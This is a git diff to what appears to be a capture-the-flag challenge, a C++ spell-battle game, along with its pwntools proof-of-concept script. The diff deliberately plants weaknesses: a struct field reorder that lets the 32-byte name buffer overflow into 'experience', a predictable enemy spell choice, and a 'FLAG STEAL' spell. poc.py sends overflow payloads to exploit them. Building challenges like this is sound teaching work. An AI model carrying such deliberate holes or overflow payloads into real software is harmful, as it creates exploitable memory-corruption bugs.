diff --git a/lib/Battle.cpp b/lib/Battle.cpp
index 801c745..2681dd5 100644
--- a/lib/Battle.cpp
+++ b/lib/Battle.cpp
@@ -1,6 +1,7 @@
 #include "Battle.hpp"
 
 std::vector<Spell> Battle::SPELL_BOOK = {
+    Spell("FLAG STEAL", Spell::TYPE_DESTRUCTION, 1000000, 1),
     Spell("Blazing Storm", Spell::TYPE_DESTRUCTION, 10, 5),
     Spell("Energy Arrow", Spell::TYPE_DESTRUCTION, 40, 10),
     Spell("Pyro Strike", Spell::TYPE_DESTRUCTION, 90, 15),
@@ -162,7 +163,7 @@ void Battle::start()
             UserInterface::print(buff);
         }
 
-        choiceInt = (random() % (player2.getLevel() < SPELL_BOOK.size() ? player2.getLevel() : SPELL_BOOK.size())) + 1;
+        choiceInt = (this->turn % (player2.getLevel() < SPELL_BOOK.size() ? player2.getLevel() : SPELL_BOOK.size())) + 1;
         if (player2.canCastSpell(SPELL_BOOK.at(choiceInt)))
         {
             player2.castSpell(SPELL_BOOK.at(choiceInt), player1);
diff --git a/lib/Character.cpp b/lib/Character.cpp
index c8870ba..9bbe0c9 100644
--- a/lib/Character.cpp
+++ b/lib/Character.cpp
@@ -4,7 +4,7 @@
 #include "Character.hpp"
 
 const long Character::MAX_LVL = 1000000L;
-const long Character::MAX_EXP = 1000000000000L;
+const long Character::MAX_EXP = 0x1fffffffffffffff;
 
 Character::Character(const char *characterName,
                      long characterLevel)
@@ -52,7 +52,7 @@ long Character::getLevel()
 
 long Character::getExperience()
 {
-    if (experience > Character::MAX_LVL)
+    if (experience > Character::MAX_EXP)
     {
         exit(-1);
     }
diff --git a/lib/Character.hpp b/lib/Character.hpp
index a15a8ce..a513b29 100644
--- a/lib/Character.hpp
+++ b/lib/Character.hpp
@@ -12,8 +12,8 @@ protected:
     static const long MAX_EXP;
 
     char name[32];
-    long level;
     long experience;
+    long level;
     long maxHP;
     long maxMP;
     long curHP;
diff --git a/lib/Spell.hpp b/lib/Spell.hpp
index bbc6de2..516f63f 100644
--- a/lib/Spell.hpp
+++ b/lib/Spell.hpp
@@ -4,7 +4,7 @@
 class Spell
 {
 protected:
-    char name[16];
+    char name[64];
     int type;
     int power;
     int cost;
diff --git a/poc.py b/poc.py
index de89014..c711370 100644
--- a/poc.py
+++ b/poc.py
@@ -1,9 +1,10 @@
-from pwn import *
+from pwn import process
 
-if __name__ == "__main__":
-    p = process("./main")
+
+def poc0():
+    p = process("./spell-warz-again")
     print p.recvuntil(">")
-    p.sendline(("A" * 16) + ("\xff\xff\xff\x0f\x01"))
+    p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
     print p.recvuntil(">")
     p.sendline("y")
     print p.recvuntil(">")
@@ -12,7 +13,46 @@ if __name__ == "__main__":
     p.sendline("4")
     print p.recvuntil(">")
     p.sendline("y")
-    for i in xrange(99):
+    for _ in xrange(10):
         print p.recvuntil(">")
-        p.sendline("9")
+        p.sendline("100")
+    p.interactive()
+
+
+def poc1():
+    p = process("./spell-warz-again")
+    print p.recvuntil(">")
+    p.sendline("Leo")
+    print p.recvuntil(">")
+    p.sendline("y")
+    print p.recvuntil(">")
+    p.sendline("2")
+    print p.recvuntil(">")
+    p.sendline("4")
+    print p.recvuntil(">")
+    p.sendline("y")
+    print p.recvuntil(">")
+    p.sendline("0")
     p.interactive()
+
+
+def poc2():
+    p = process("./spell-warz-again")
+    print p.recvuntil(">")
+    p.sendline("__th3_w0rLd_D3str0Y3r__")
+    print p.recvuntil(">")
+    p.sendline("y")
+    print p.recvuntil(">")
+    p.sendline("2")
+    print p.recvuntil(">")
+    p.sendline("4")
+    print p.recvuntil(">")
+    p.sendline("y")
+    for _ in xrange(10):
+        print p.recvuntil(">")
+        p.sendline("100")
+    p.interactive()
+
+
+if __name__ == "__main__":
+    poc0()